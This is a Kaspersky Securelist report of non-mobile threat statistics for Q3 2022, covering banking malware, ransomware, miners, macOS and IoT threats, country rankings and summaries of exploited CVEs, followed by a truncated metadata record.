IT threat evolution in Q3 2022. Non-mobile statistics

2022-11-18T08:10:34

Description

![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/11/17134132/abstract_binary_brain_report-990x400.jpg) * [IT threat evolution in Q3 2022](<https://securelist.com/it-threat-evolution-q3-2022/107957/>) * **IT threat evolution in Q3 2022. Non-mobile statistics** * [IT threat evolution in Q3 2022. Mobile statistics](<https://securelist.com/it-threat-evolution-in-q3-2022-mobile-statistics/107978/>) _These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data._ ## Quarterly figures According to Kaspersky Security Network, in Q3 2022: * Kaspersky solutions blocked 956,074,958 attacks from online resources across the globe. * Web Anti-Virus recognized 251,288,987 unique URLs as malicious. * Attempts to run malware for stealing money from online bank accounts were stopped on the computers of 99,989 unique users. * Ransomware attacks were defeated on the computers of 72,941 unique users. * Our File Anti-Virus detected 49,275,253 unique malicious and potentially unwanted objects. ## Financial threats ### Number of users attacked by banking malware In Q3 2022, Kaspersky solutions blocked the launch of at least one piece of banking malware on the computers of 99,989 unique users. _Number of unique users attacked by financial malware, Q3 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/11/15154318/01-en-malware-report-q3-2022-pc-stat.png>))_ ### TOP 10 banking malware families | **Name** | **Verdicts** | **%*** ---|---|---|--- 1 | Ramnit/Nimnul | Trojan-Banker.Win32.Ramnit | 33.2 2 | Zbot/Zeus | Trojan-Banker.Win32.Zbot | 15.2 3 | IcedID | Trojan-Banker.Win32.IcedID | 10.0 4 | CliptoShuffler | Trojan-Banker.Win32.CliptoShuffler | 5.8 5 | Trickster/Trickbot | Trojan-Banker.Win32.Trickster | 5.8 6 | SpyEye | Trojan-Spy.Win32.SpyEye | 2.1 7 | RTM | Trojan-Banker.Win32.RTM | 1.9 8 | Danabot | Trojan-Banker.Win32.Danabot | 1.4 9 | Tinba/TinyBanker | Trojan-Banker.Win32.Tinba | 1.4 10 | Gozi | Trojan-Banker.Win32.Gozi | 1.1 _* Unique users who encountered this malware family as a percentage of all users attacked by financial malware._ ### Geography of financial malware attacks **TOP 10 countries and territories by share of attacked users** | **Country or territory*** | **%**** ---|---|--- 1 | Turkmenistan | 4.7 2 | Afghanistan | 4.6 3 | Paraguay | 2.8 4 | Tajikistan | 2.8 5 | Yemen | 2.3 6 | Sudan | 2.3 7 | China | 2.0 8 | Switzerland | 2.0 9 | Egypt | 1.9 10 | Venezuela | 1.8 _* Excluded are countries and territories with relatively few Kaspersky users (under 10,000). ** Unique users whose computers were targeted by financial malware as a percentage of all unique users of Kaspersky products in the country._ ## Ransomware programs ### Quarterly trends and highlights The third quarter of 2022 saw the builder for LockBit, a well-known ransomware, [leaked online](<https://www.bleepingcomputer.com/news/security/lockbit-ransomware-builder-leaked-online-by-angry-developer-/>). LockBit themselves attributed the leakage to one of their developers' personal initiative, not the group's getting hacked. One way or another, the LockBit 3.0 build kit is now accessible to the broader cybercriminal community. Similarly to other ransomware families in the past, such as Babuk and Conti, Trojan builds generated with the leaked builder began to serve other groups unrelated to LockBit. One example was Bloody/Bl00dy [spotted back in May](<https://www.bleepingcomputer.com/news/security/leaked-lockbit-30-builder-used-by-bl00dy-ransomware-gang-in-attacks/>). A borrower rather than a creator, this group added the freshly available LockBit to its arsenal in September 2022. Mass attacks on NAS (network attached storage) devices continue. QNAP issued warnings about Checkmate and Deadbolt infections in Q3 2022. The [former](<https://www.qnap.com/en/security-advisory/QSA-22-21>) threatened files accessible from the internet over SMB protocol and protected by a weak account password. The latter [attacked](<https://www.qnap.com/en/security-news/2022/take-immediate-action-to-update-photo-station-to-the-latest-available-version>) devices that had a vulnerable version of the Photo Station software installed. Threats that target NAS remain prominent, so we recommend keeping these devices inaccessible from the internet to ensure maximum safety of your data. The United States Department of Justice [announced](<https://www.justice.gov/opa/pr/justice-department-seizes-and-forfeits-approximately-500000-north-korean-ransomware-actors>) that it had teamed up with the FBI to seize about $500,000 paid as ransom after a Maui ransomware attack. The Trojan was likely [used](<https://securelist.com/andariel-deploys-dtrack-and-maui-ransomware/107063/>) by the North Korean operators Andariel. The DOJ said victims had started getting their money back. The creators of the little-known AstraLocker and Yashma ransomware [published](<https://www.bleepingcomputer.com/news/security/astralocker-ransomware-shuts-down-and-releases-decryptors/>) decryptors and stopped spreading both of them. The hackers provided no explanation for the move, but it appeared to be related to an increase in media coverage. ### Number of new modifications In Q3 2022, we detected 17 new ransomware families and 14,626 new modifications of this malware type. More than 11,000 of those were assigned the verdict of Trojan-Ransom.Win32.Crypmod, which hit the sixth place in our rankings of the most widespread ransomware Trojans. _Number of new ransomware modifications, Q3 2021 — Q3 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/11/15154421/03-en-ru-es-malware-report-q3-2022-pc-stat.png>))_ ### Number of users attacked by ransomware Trojans In Q3 2022, Kaspersky products and technologies protected 72,941 users from ransomware attacks. _Number of unique users attacked by ransomware Trojans, Q3 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/11/15154500/04-en-malware-report-q3-2022-pc-stat.png>))_ **TOP 10 most common families of ransomware Trojans** | **Name** | **Verdicts** | **%*** ---|---|---|--- 1 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 14.76 2 | WannaCry | Trojan-Ransom.Win32.Wanna | 12.12 3 | (generic verdict) | Trojan-Ransom.Win32.Gen | 11.68 4 | Stop/Djvu | Trojan-Ransom.Win32.Stop | 6.59 5 | (generic verdict) | Trojan-Ransom.Win32.Phny | 6.53 6 | (generic verdict) | Trojan-Ransom.Win32.Crypmod 7 | Magniber | Trojan-Ransom.Win64.Magni | 4.93 8 | PolyRansom/VirLock | Trojan-Ransom.Win32.PolyRansom / Virus.Win32.PolyRansom | 4.84 9 | (generic verdict) | Trojan-Ransom.Win32.Instructions | 4.35 10 | Hive | Trojan-Ransom.Win32.Hive | 3.87 _* Unique users who encountered this malware family as a percentage of all users attacked by financial malware._ ### Geography of attacked users **TOP 10 countries and territories attacked by ransomware Trojans** | **Country or territory*** | **%**** ---|---|--- 1 | Bangladesh | 1.66 2 | Yemen | 1.30 3 | South Korea | 0.98 4 | Taiwan | 0.77 5 | Mozambique | 0.64 6 | China | 0.52 7 | Colombia | 0.43 8 | Nigeria | 0.40 9 | Pakistan | 0.39 10 | Venezuela | 0.32 _* Excluded are countries with relatively few Kaspersky users (under 50,000). ** Unique users whose computers were attacked by ransomware Trojans as a percentage of all unique users of Kaspersky products in the country._ ### TOP 10 most common families of ransomware Trojans | **Name** | **Verdicts*** | **Percentage of attacked users**** ---|---|---|--- 1 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 14.76 2 | WannaCry | Trojan-Ransom.Win32.Wanna | 12.12 3 | (generic verdict) | Trojan-Ransom.Win32.Gen | 11.68 4 | Stop/Djvu | Trojan-Ransom.Win32.Stop | 6.59 5 | (generic verdict) | Trojan-Ransom.Win32.Phny | 6.53 6 | (generic verdict) | Trojan-Ransom.Win32.Crypmod | 5.46 7 | Magniber | Trojan-Ransom.Win64.Magni | 4.93 8 | PolyRansom/VirLock | Trojan-Ransom.Win32.PolyRansom / Virus.Win32.PolyRansom | 4.84 9 | (generic verdict) | Trojan-Ransom.Win32.Instructions | 4.35 10 | Hive | Trojan-Ransom.Win32.Hive | 3.87 _* Statistics are based on detection verdicts of Kaspersky products. The information was provided by Kaspersky product users who consented to providing statistical data. ** Unique Kaspersky users attacked by specific ransomware Trojan families as a percentage of all unique users attacked by ransomware Trojans._ ## Miners ### Number of new miner modifications In Q3 2022, Kaspersky systems detected 153,773 new miner mods. More than 140,000 of these were found in July and August; combined with June's figure of more than 35,000, this suggests that miner creators kept themselves abnormally busy this past summer. _Number of new miner modifications, Q3 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/11/15154533/06-en-malware-report-q3-2022-pc-stat.png>))_ ### Number of users attacked by miners In Q3, we detected attacks that used miners on the computers of 432,363 unique users of Kaspersky products worldwide. A quieter period from late spring through the early fall was followed by another increase in activity. _Number of unique users attacked by miners, Q3 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/11/15154601/07-en-malware-report-q3-2022-pc-stat.png>))_ ### Geography of miner attacks **TOP 10 countries and territories attacked by miners** | **Country or territory*** | **%**** ---|---|--- 1 | Ethiopia | 2.38 2 | Kazakhstan | 2.13 3 | Uzbekistan | 2.01 4 | Rwanda | 1.93 5 | Tajikistan | 1.83 6 | Venezuela | 1.78 7 | Kyrgyzstan | 1.73 8 | Mozambique | 1.57 9 | Tanzania | 1.56 10 | Ukraine | 1.54 _* Excluded are countries and territories with relatively few users of Kaspersky products (under 50,000). ** Unique users attacked by miners as a percentage of all unique users of Kaspersky products in the country._ ## Vulnerable applications used by criminals during cyberattacks ### Quarterly highlights Q3 2022 was remembered for a series of vulnerabilities discovered in various software products. Let's begin with Microsoft Windows and some of its components. Researchers found new vulnerabilities that affected the CLFS driver: [CVE-2022-30220](<https://nvd.nist.gov/vuln/detail/CVE-2022-30220>), along with [CVE-2022-35803](<https://nvd.nist.gov/vuln/detail/CVE-2022-35803>) and [CVE-2022-37969](<https://nvd.nist.gov/vuln/detail/CVE-2022-37969>), both encountered in the wild. By manipulating Common Log File System data in a specific way, an attacker can make the kernel write their own data to arbitrary memory addresses, allowing cybercriminals to hijack kernel control and elevate their privileges in the system. Several vulnerabilities were discovered in the Print Spooler service: [CVE-2022-22022](<https://nvd.nist.gov/vuln/detail/CVE-2022-22022>), [CVE-2022-30206](<https://nvd.nist.gov/vuln/detail/CVE-2022-30206>), and [CVE-2022-30226](<https://nvd.nist.gov/vuln/detail/CVE-2022-30226>). These allow elevating the system privileges through a series of manipulations while installing a printer. Serious vulnerabilities were also discovered in the Client/Server Runtime Subsystem (CSRSS), an essential Windows component. Some of these can be exploited for privilege escalation ([CVE-2022-22047](<https://nvd.nist.gov/vuln/detail/CVE-2022-22047>), [CVE-2022-22049](<https://nvd.nist.gov/vuln/detail/CVE-2022-22049>), and [CVE-2022-22026](<https://nvd.nist.gov/vuln/detail/CVE-2022-22026>)), while [CVE-2022-22038](<https://nvd.nist.gov/vuln/detail/CVE-2022-22038>) affects remote procedure call (RPC) protocol, allowing an attacker to execute arbitrary code remotely. A series of critical vulnerabilities were discovered in the graphics subsystem, including [CVE-2022-22034](<https://nvd.nist.gov/vuln/detail/CVE-2022-22034>) and [CVE-2022-35750](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-35750>), which can also be exploited for privilege escalation. Note that most of the above vulnerabilities require that exploits entrench in the system before an attacker can run their malware. The Microsoft Support Diagnostic Tool (MSDT) was found to contain a further two vulnerabilities, [CVE-2022-34713](<https://nvd.nist.gov/vuln/detail/CVE-2022-34713>) and [CVE-2022-35743](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-35743>), which can be exploited to take advantage of security flaws in the link handler to remotely run commands in the system. Most of the network threats detected in Q3 2022 were again attacks associated with [brute-forcing](<https://encyclopedia.kaspersky.com/glossary/brute-force/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) passwords for Microsoft SQL Server, RDP, and other services. Network attacks on vulnerable versions of Windows via EternalBlue, EternalRomance, and other exploits were still common. The attempts at exploiting network services and other software via vulnerabilities in the Log4j library ([CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>), [CVE-2021-44832](<https://nvd.nist.gov/vuln/detail/CVE-2021-44832>), [CVE-2021-45046](<https://nvd.nist.gov/vuln/detail/CVE-2021-45046>), and [CVE-2021-45105](<https://nvd.nist.gov/vuln/detail/cve-2021-45105>)) also continued. Several vulnerabilities were found in the Microsoft Windows Network File System (NFS) driver. These are [CVE-2022-22028](<https://nvd.nist.gov/vuln/detail/CVE-2022-22028>), which can lead to leakage of confidential information, as well as [CVE-2022-22029](<https://nvd.nist.gov/vuln/detail/CVE-2022-22029>), [CVE-2022-22039](<https://nvd.nist.gov/vuln/detail/CVE-2022-22039>) and [CVE-2022-34715](<https://nvd.nist.gov/vuln/detail/CVE-2022-34715>), which a cybercriminal can use to remotely execute arbitrary code in the system — in kernel context — by using a specially crafted network packet. The TCP/IP stack was found to contain the critical vulnerability [CVE-2022-34718](<https://nvd.nist.gov/vuln/detail/CVE-2022-34718>), which allows in theory to remotely exploit a target system by taking advantage of errors in the IPv6 protocol handler. Finally, it is worth mentioning the [CVE-2022-34724](<https://nvd.nist.gov/vuln/detail/CVE-2022-34724>) vulnerability, which affects Windows DNS Server and can lead to denial of service if exploited. Two vulnerabilities in Microsoft Exchange Server, [CVE-2022-41040](<https://nvd.nist.gov/vuln/detail/CVE-2022-41040>) and [CVE-2022-41082](<https://nvd.nist.gov/vuln/detail/CVE-2022-41082>), received considerable media coverage. They were collectively dubbed "ProxyNotShell" in reference to the ProxyShell vulnerabilities with similar exploitation technique (they were closed earlier). Researchers discovered the ProxyNotShell exploits while investigating an APT attack: an authenticated user can use the loopholes to elevate their privileges and run arbitrary code on an MS Exchange server. As a result, the attacker can steal confidential data, encrypt critical files on the server to to extort money from the victim, etc. ### Vulnerability statistics In Q3 2022, malicious Microsoft Office documents again accounted for the greatest number of detections — 80% of the exploits we discovered, although the number decreased slightly compared to Q2. Most of these detections were triggered by exploits that targeted the following vulnerabilities: * [CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>) and [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>), in the Equation Editor component, which allow corrupting the application memory when processing formulas, and subsequently running arbitrary code in the system; * [CVE-2017-0199](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199>), which allows downloading and running malicious script files; * [CVE-2022-30190](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30190>), also known as "Follina", which exploits a flaw in the Microsoft Windows Support Diagnostic Tool (MSDT) for running arbitrary programs in a vulnerable system even in Protected Mode or when macros are disabled; * [CVE-2021-40444](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40444>), which allows an attacker to deploy malicious code using a special ActiveX template due to inadequate input validation. _Distribution of exploits used by cybercriminals, by type of attacked application, Q3 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/11/15154631/09-en-malware-report-q3-2022-pc-stat.png>))_ These were followed by exploits that target browsers. Their share amounted to 6%, or 1% higher than in Q2. We will list the most serious vulnerabilities, all of them targeting Google Chrome: * [CVE-2022-2294](<https://nvd.nist.gov/vuln/detail/CVE-2022-2294>), in the WebRTC component, which leads to buffer overflow; * [CVE-2022-2624](<https://nvd.nist.gov/vuln/detail/CVE-2022-2624>), which exploits a memory overflow error in the PDF viewing component; * [CVE-2022-2295](<https://nvd.nist.gov/vuln/detail/CVE-2022-2295>), a Type Confusion error that allows an attacker to corrupt the browser process memory remotely and run arbitrary code in a sandbox; * [CVE-2022-3075](<https://nvd.nist.gov/vuln/detail/CVE-2022-3075>), an error linked to inadequate input validation in the Mojo interprocess communication component in Google Chromium-based browsers that allows escaping the sandbox and running arbitrary commands in the system. Since many modern browsers are based on Google Chromium, attackers can often take advantage of the shared vulnerabilities to attack the other browsers as long as they run on one engine. A series of vulnerabilities were identified in Microsoft Edge. Worth noting is [CVE-2022-33649](<https://nvd.nist.gov/vuln/detail/CVE-2022-33649>), which allows running an application in the system by circumventing the browser protections; [CVE-2022-33636](<https://nvd.nist.gov/vuln/detail/CVE-2022-33636>) and [CVE-2022-35796](<https://nvd.nist.gov/vuln/detail/CVE-2022-35796>), Race Condition vulnerabilities that ultimately allow a sandbox escape; and [CVE-2022-38012](<https://nvd.nist.gov/vuln/detail/CVE-2022-38012>), which exploits an application memory corruption error, with similar results. The Mozilla Firefox browser was found to contain vulnerabilities associated with memory corruption, which allow running arbitrary code in the system: [CVE-2022-38476](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38476>), a Race Condition vulnerability that leads to a subsequent Use-After-Free scenario, and the similar vulnerabilities [CVE-2022-38477](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38477>) and [CVE-2022-38478](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38478>), which exploit memory corruption. As you can see from our reports, browsers are an attractive target for cybercriminals, as these are widely used and allow attackers to infiltrate the system remotely and virtually unbeknownst to the user. That said, browser vulnerabilities are not simple to exploit, as attackers often have to use a chain of vulnerabilities to work around the protections of modern browsers. The remaining positions in our rankings were distributed among Android (5%) and Java (4%) exploits. The fifth-highest number of exploits (3%) targeted Adobe Flash, a technology that is obsolete but remains in use. Rounding out the rankings with 2% were exploits spread through PDF documents. ## Attacks on macOS The third quarter of 2022 brought with it a significant number of interesting macOS malware discoveries. In particular, researchers found [Operation In(ter)ception](<https://www.sentinelone.com/blog/lazarus-operation-interception-targets-macos-users-dreaming-of-jobs-in-crypto/>), a campaign operated by North Korean Lazarus group, which targets macOS users looking for cryptocurrency jobs. The malware was disguised as documents containing summaries of positions at Coinbase and Crypto.com. [CloudMensis](<https://www.welivesecurity.com/2022/07/19/i-see-what-you-did-there-look-cloudmensis-macos-spyware/>), a spy program written in Objective-C, used cloud storage services as C&C servers and [shared several characteristics](<https://twitter.com/ESETresearch/status/1575103839115804672>) with the RokRAT Windows malware operated by ScarCruft. The creators of XCSSET [adapted](<https://www.sentinelone.com/blog/xcsset-malware-update-macos-threat-actors-prepare-for-life-without-python/>) their toolset to macOS Monterey and migrated from Python 2 to Python 3. In Q3, cybercrooks also began to make use of open-source tools in their attacks. July saw the discovery of two campaigns that used a fake [VPN application](<https://www.sentinelone.com/blog/from-the-front-lines-new-macos-covid-malware-masquerades-as-apple-wears-face-of-apt/>) and fake [Salesforce updates](<https://twitter.com/ESETresearch/status/1547943014860894210>), both built on the Sliver framework. In addition to this, researchers announced a new multi-platform [find](<https://blog.sekoia.io/luckymouse-uses-a-backdoored-electron-app-to-target-macos/>): the LuckyMouse group (APT27 / Iron Tiger / Emissary Panda) attacked Windows, Linux, and macOS users with a malicious mod of the Chinese MiMi instant messaging application. ### TOP 20 threats for macOS | **Verdict** | **%*** ---|---|--- 1 | AdWare.OSX.Amc.e | 14.77 2 | AdWare.OSX.Pirrit.ac | 10.45 3 | AdWare.OSX.Agent.ai | 9.40 4 | Monitor.OSX.HistGrabber.b | 7.15 5 | AdWare.OSX.Pirrit.j | 7.10 6 | AdWare.OSX.Bnodlero.at | 6.09 7 | AdWare.OSX.Bnodlero.ax | 5.95 8 | Trojan-Downloader.OSX.Shlayer.a | 5.71 9 | AdWare.OSX.Pirrit.ae | 5.27 10 | Trojan-Downloader.OSX.Agent.h | 3.87 11 | AdWare.OSX.Bnodlero.bg | 3.46 12 | AdWare.OSX.Pirrit.o | 3.32 13 | AdWare.OSX.Agent.u | 3.13 14 | AdWare.OSX.Agent.gen | 2.90 15 | AdWare.OSX.Pirrit.aa | 2.85 16 | Backdoor.OSX.Twenbc.e | 2.85 17 | AdWare.OSX.Ketin.h | 2.82 18 | AdWare.OSX.Pirrit.gen | 2.69 19 | Trojan-Downloader.OSX.Lador.a | 2.52 20 | Downloader.OSX.InstallCore.ak | 2.28 _* Unique users who encountered this malware as a percentage of all users of Kaspersky security solutions for macOS who were attacked._ As usual, our TOP 20 ranking for biggest threats encountered by users of Kaspersky security solutions for macOS were dominated by adware. AdWare.OSX.Amc.e, touted as "Advanced Mac Cleaner," had taken the top place for a second quarter in a row. This application displays fake system issue messages, offering to buy the full version to fix those. Second and third places went to members of the AdWare.OSX.Pirrit and AdWare.OSX.Agent families. ### Geography of threats for macOS **TOP 10 countries and territories by share of attacked users** | **Country or territory*** | **%**** ---|---|--- 1 | France | 1.71 2 | Canada | 1.70 3 | Russia | 1.57 4 | India | 1.53 5 | United States | 1.52 6 | Spain | 1.48 7 | Australia | 1.36 8 | Italy | 1.35 9 | Mexico | 1.27 10 | United Kingdom | 1.24 _* Excluded from the rankings are countries with relatively few users of Kaspersky security solutions for macOS (under 10,000). ** Unique users attacked as a percentage of all users of Kaspersky security solutions for macOS in the country._ France, with 1.71%, was again the most attacked country by number of users. Canada, with 1.70%, and Russia, with 1.57%, followed close behind. The most frequently encountered family in France and Canada was AdWare.OSX.Amc.e, and in Russia, it was AdWare.OSX.Pirrit.ac. ## IoT attacks ### IoT threat statistics In Q3 2022, three-fourths of the devices that attacked Kaspersky honeypots used the Telnet protocol. Telnet | 75.92% ---|--- SSH | 24.08% _Distribution of attacked services by number of unique IP addresses of attacking devices, Q3 2022_ A majority of the attacks on Kaspersky honeypots in terms of sessions were controlled via Telnet as well. Telnet | 97.53% ---|--- SSH | 2.47% _Distribution of cybercriminal working sessions with Kaspersky traps, Q3 2022_ **TOP 10 threats delivered to IoT devices via Telnet** | **Verdict** | **%*** ---|---|--- 1 | Backdoor.Linux.Mirai.b | 28.67 2 | Trojan-Downloader.Linux.NyaDrop.b | 18.63 3 | Backdoor.Linux.Mirai.ba | 11.63 4 | Backdoor.Linux.Mirai.cw | 10.94 5 | Backdoor.Linux.Gafgyt.a | 3.69 6 | Backdoor.Linux.Mirai.ew | 3.49 7 | Trojan-Downloader.Shell.Agent.p | 2.56 8 | Backdoor.Linux.Gafgyt.bj | 1.63 9 | Backdoor.Linux.Mirai.et | 1.17 10 | Backdoor.Linux.Mirai.ek | 1.08 _* Share of each threat delivered to infected devices as a result of a successful Telnet attack out of the total number of delivered threats._ Detailed IoT-threat statistics are published in the DDoS report for Q3 2022. ## Attacks via web resources _The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Cybercriminals create these sites on purpose; they can infect hacked legitimate resources as well as web resources with user-created content, such as forums._ ### Countries and territories that serve as sources of web-based attacks: TOP 10 _The following statistics show the distribution by country or territory of the sources of internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites hosting malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks._ _To determine the geographic source of web attacks, the GeoIP technique was used to match the domain name to the real IP address at which the domain is hosted._ In Q3 2022, Kaspersky solutions blocked 956,074,958 attacks launched from online resources across the globe. A total of 251,288,987 unique URLs were recognized as malicious by Web Anti-Virus components. _Distribution of web-attack sources country and territory, Q3 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/11/15154703/11-en-malware-report-q3-2022-pc-stat.png>))_ ### Countries and territories where users faced the greatest risk of online infection To assess the risk of online infection faced by users in different countries and territories, for each country or territory we calculated the percentage of Kaspersky users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries and territories. Note that these rankings only include attacks by malicious objects that fall under the **_Malware_**_ class_; they do not include Web Anti-Virus detections of potentially dangerous or unwanted programs, such as RiskTool or adware. | **Country or territory*** | **%**** ---|---|--- 1 | Taiwan | 19.65 2 | Belarus | 17.01 3 | Serbia | 15.05 4 | Russia | 14.12 5 | Algeria | 14.01 6 | Turkey | 13.82 7 | Tunisia | 13.31 8 | Bangladesh | 13.30 9 | Moldova | 13.22 10 | Palestine | 12.61 11 | Yemen | 12.58 12 | Ukraine | 12.25 13 | Libya | 12.23 14 | Sri Lanka | 11.97 15 | Kyrgyzstan | 11.69 16 | Estonia | 11.65 17 | Hong Kong | 11.52 18 | Nepal | 11.52 19 | Syria | 11.39 20 | Lithuania | 11.33 _* Excluded are countries and territories with relatively few Kaspersky users (under 10,000)._ _** Unique users targeted by **Malware**-class attacks as a percentage of all unique users of Kaspersky products in the country._ On average during the quarter, 9.08% of internet users' computers worldwide were subjected to at least one **Malware**-class web attack. ## Local threats _In this section, we analyze statistical data obtained from the OAS and ODS modules of Kaspersky products. It takes into account malicious programs that were found directly on users' computers or removable media connected to them (flash drives, camera memory cards, phones, external hard drives), or which initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.)._ In Q3 2022, our File Anti-Virus detected **49,275,253** malicious and potentially unwanted objects. ### Countries and territories where users faced the highest risk of local infection For each country, we calculated the percentage of Kaspersky product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries. These rankings only include attacks by malicious programs that fall under the **Malware** class; they do not include File Anti-Virus triggerings in response to potentially dangerous or unwanted programs, such as RiskTool or adware. | **Country or territory*** | **%**** ---|---|--- 1 | Turkmenistan | 46.48 2 | Yemen | 45.12 3 | Afghanistan | 44.18 4 | Cuba | 40.48 5 | Tajikistan | 39.17 6 | Bangladesh | 37.06 7 | Uzbekistan | 37.00 8 | Ethiopia | 36.96 9 | South Sudan | 36.89 10 | Myanmar | 36.64 11 | Syria | 34.82 12 | Benin | 34.56 13 | Burundi | 33.91 14 | Tanzania | 33.05 15 | Rwanda | 33.03 16 | Chad | 33.01 17 | Venezuela | 32.79 18 | Cameroon | 32.30 19 | Sudan | 31.93 20 | Malawi | 31.88 _* Excluded are countries with relatively few Kaspersky users (under 10,000)._ _** Unique users on whose computers **Malware**-class local threats were blocked, as a percentage of all unique users of Kaspersky products in the country._ On average worldwide, Malware-class local threats were registered on 14.74% of users' computers at least once during Q3. Russia scored 16.60% in this ranking.

{"id": "SECURELIST:C1F2E1B6711C8D84F3E78D203B3CE837", "vendorId": null, "type": "securelist", "bulletinFamily": "blog", "title": "IT threat evolution in Q3 2022. Non-mobile statistics", "description": "![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/11/17134132/abstract_binary_brain_report-990x400.jpg)\n\n * [IT threat evolution in Q3 2022](<https://securelist.com/it-threat-evolution-q3-2022/107957/>)\n * **IT threat evolution in Q3 2022. Non-mobile statistics**\n * [IT threat evolution in Q3 2022. Mobile statistics](<https://securelist.com/it-threat-evolution-in-q3-2022-mobile-statistics/107978/>)\n\n_These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data._\n\n## Quarterly figures\n\nAccording to Kaspersky Security Network, in Q3 2022:\n\n * Kaspersky solutions blocked 956,074,958 attacks from online resources across the globe.\n * Web Anti-Virus recognized 251,288,987 unique URLs as malicious.\n * Attempts to run malware for stealing money from online bank accounts were stopped on the computers of 99,989 unique users.\n * Ransomware attacks were defeated on the computers of 72,941 unique users.\n * Our File Anti-Virus detected 49,275,253 unique malicious and potentially unwanted objects.\n\n## Financial threats\n\n### Number of users attacked by banking malware\n\nIn Q3 2022, Kaspersky solutions blocked the launch of at least one piece of banking malware on the computers of 99,989 unique users.\n\n_Number of unique users attacked by financial malware, Q3 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/11/15154318/01-en-malware-report-q3-2022-pc-stat.png>))_\n\n### TOP 10 banking malware families\n\n| **Name** | **Verdicts** | **%*** \n---|---|---|--- \n1 | Ramnit/Nimnul | Trojan-Banker.Win32.Ramnit | 33.2 \n2 | Zbot/Zeus | Trojan-Banker.Win32.Zbot | 15.2 \n3 | IcedID | Trojan-Banker.Win32.IcedID | 10.0 \n4 | CliptoShuffler | Trojan-Banker.Win32.CliptoShuffler | 5.8 \n5 | Trickster/Trickbot | Trojan-Banker.Win32.Trickster | 5.8 \n6 | SpyEye | Trojan-Spy.Win32.SpyEye | 2.1 \n7 | RTM | Trojan-Banker.Win32.RTM | 1.9 \n8 | Danabot | Trojan-Banker.Win32.Danabot | 1.4 \n9 | Tinba/TinyBanker | Trojan-Banker.Win32.Tinba | 1.4 \n10 | Gozi | Trojan-Banker.Win32.Gozi | 1.1 \n \n_* Unique users who encountered this malware family as a percentage of all users attacked by financial malware._\n\n### Geography of financial malware attacks\n\n**TOP 10 countries and territories by share of attacked users**\n\n| **Country or territory*** | **%**** \n---|---|--- \n1 | Turkmenistan | 4.7 \n2 | Afghanistan | 4.6 \n3 | Paraguay | 2.8 \n4 | Tajikistan | 2.8 \n5 | Yemen | 2.3 \n6 | Sudan | 2.3 \n7 | China | 2.0 \n8 | Switzerland | 2.0 \n9 | Egypt | 1.9 \n10 | Venezuela | 1.8 \n \n_* Excluded are countries and territories with relatively few Kaspersky users (under 10,000). \n** Unique users whose computers were targeted by financial malware as a percentage of all unique users of Kaspersky products in the country._\n\n## Ransomware programs\n\n### Quarterly trends and highlights\n\nThe third quarter of 2022 saw the builder for LockBit, a well-known ransomware, [leaked online](<https://www.bleepingcomputer.com/news/security/lockbit-ransomware-builder-leaked-online-by-angry-developer-/>). LockBit themselves attributed the leakage to one of their developers' personal initiative, not the group's getting hacked. One way or another, the LockBit 3.0 build kit is now accessible to the broader cybercriminal community. Similarly to other ransomware families in the past, such as Babuk and Conti, Trojan builds generated with the leaked builder began to serve other groups unrelated to LockBit. One example was Bloody/Bl00dy [spotted back in May](<https://www.bleepingcomputer.com/news/security/leaked-lockbit-30-builder-used-by-bl00dy-ransomware-gang-in-attacks/>). A borrower rather than a creator, this group added the freshly available LockBit to its arsenal in September 2022.\n\nMass attacks on NAS (network attached storage) devices continue. QNAP issued warnings about Checkmate and Deadbolt infections in Q3 2022. The [former](<https://www.qnap.com/en/security-advisory/QSA-22-21>) threatened files accessible from the internet over SMB protocol and protected by a weak account password. The latter [attacked](<https://www.qnap.com/en/security-news/2022/take-immediate-action-to-update-photo-station-to-the-latest-available-version>) devices that had a vulnerable version of the Photo Station software installed. Threats that target NAS remain prominent, so we recommend keeping these devices inaccessible from the internet to ensure maximum safety of your data.\n\nThe United States Department of Justice [announced](<https://www.justice.gov/opa/pr/justice-department-seizes-and-forfeits-approximately-500000-north-korean-ransomware-actors>) that it had teamed up with the FBI to seize about $500,000 paid as ransom after a Maui ransomware attack. The Trojan was likely [used](<https://securelist.com/andariel-deploys-dtrack-and-maui-ransomware/107063/>) by the North Korean operators Andariel. The DOJ said victims had started getting their money back.\n\nThe creators of the little-known AstraLocker and Yashma 